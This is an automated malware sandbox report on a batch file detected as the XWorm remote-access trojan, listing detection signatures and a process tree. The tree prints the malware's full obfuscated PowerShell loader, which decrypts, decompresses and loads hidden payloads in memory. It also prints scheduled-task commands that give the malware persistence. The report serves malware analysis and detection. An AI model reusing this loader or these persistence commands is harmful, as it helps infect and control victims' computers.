Windows Analysis Report
PollosAplicaccion.bat
Overview
General Information
Detection
XWorm
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected XWorm
.NET source code contains a sample name check
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Loading BitLocker PowerShell Module
Powershell drops PE file
Powershell is started from unusual location (likely to bypass HIPS)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- cmd.exe (PID: 6484 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PollosAplicaccion.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 3820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- net.exe (PID: 936 cmdline: net file MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
- net1.exe (PID: 2612 cmdline: C:\Windows\system32\net1 file MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
- powershell.exe (PID: 6392 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6VdBmIxfljLUbIX4k/VK2dkoJHwWJjnboCEGaiK9Ksk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AfGVni1E/DgzNaZyr1bq+Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $evPTP=New-Object System.IO.MemoryStream(,$param_var); $Tgngw=New-Object System.IO.MemoryStream; $glxBv=New-Object System.IO.Compression.GZipStream($evPTP, [IO.Compression.CompressionMode]::Decompress); $glxBv.CopyTo($Tgngw); $glxBv.Dispose(); $evPTP.Dispose(); $Tgngw.Dispose(); $Tgngw.ToArray();}function execute_function($param_var,$param2_var){ $RjrbO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tvMZN=$RjrbO.EntryPoint; $tvMZN.Invoke($null, $param2_var);}$dxXqn = 'C:\Users\user\Desktop\PollosAplicaccion.bat';$host.UI.RawUI.WindowTitle = $dxXqn;$qVyct=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($dxXqn).Split([Environment]::NewLine);foreach ($CWzJO in $qVyct) { if ($CWzJO.StartsWith(':: ')) { $xStIY=$CWzJO.Substring(3); break; }}$payloads_var=[string[]]$xStIY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); MD5: 04029E121A0CFA5991749937DD22A1D9)
- powershell.exe (PID: 3492 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_521_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_521.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 3568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 3504 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_521.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cmd.exe (PID: 2128 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_521.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 5224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- net.exe (PID: 4052 cmdline: net file MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
- net1.exe (PID: 2676 cmdline: C:\Windows\system32\net1 file MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
- powershell.exe (PID: 936 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6VdBmIxfljLUbIX4k/VK2dkoJHwWJjnboCEGaiK9Ksk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AfGVni1E/DgzNaZyr1bq+Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $evPTP=New-Object System.IO.MemoryStream(,$param_var); $Tgngw=New-Object System.IO.MemoryStream; $glxBv=New-Object System.IO.Compression.GZipStream($evPTP, [IO.Compression.CompressionMode]::Decompress); $glxBv.CopyTo($Tgngw); $glxBv.Dispose(); $evPTP.Dispose(); $Tgngw.Dispose(); $Tgngw.ToArray();}function execute_function($param_var,$param2_var){ $RjrbO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tvMZN=$RjrbO.EntryPoint; $tvMZN.Invoke($null, $param2_var);}$dxXqn = 'C:\Users\user\AppData\Roaming\startup_str_521.bat';$host.UI.RawUI.WindowTitle = $dxXqn;$qVyct=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($dxXqn).Split([Environment]::NewLine);foreach ($CWzJO in $qVyct) { if ($CWzJO.StartsWith(':: ')) { $xStIY=$CWzJO.Substring(3); break; }}$payloads_var=[string[]]$xStIY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); MD5: 04029E121A0CFA5991749937DD22A1D9)
- schtasks.exe (PID: 6084 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "e45iasd" /tr "C:\Users\user\e45iasd.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- conhost.exe (PID: 5140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 3136 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_521.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- e45iasd.exe (PID: 5020 cmdline: C:\Users\user\e45iasd.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 6252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- e45iasd.exe (PID: 6068 cmdline: "C:\Users\user\e45iasd.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 3640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- e45iasd.exe (PID: 6768 cmdline: "C:\Users\user\e45iasd.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
XWorm | Malware with a wide range of capabilities, ranging from RAT to ransomware. | No Attribution | | |
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XWorm_1 | Yara detected XWorm | Joe Security | | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | | |
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | | |
System Summary |
---|
Source: | Author: Thomas Patzke: |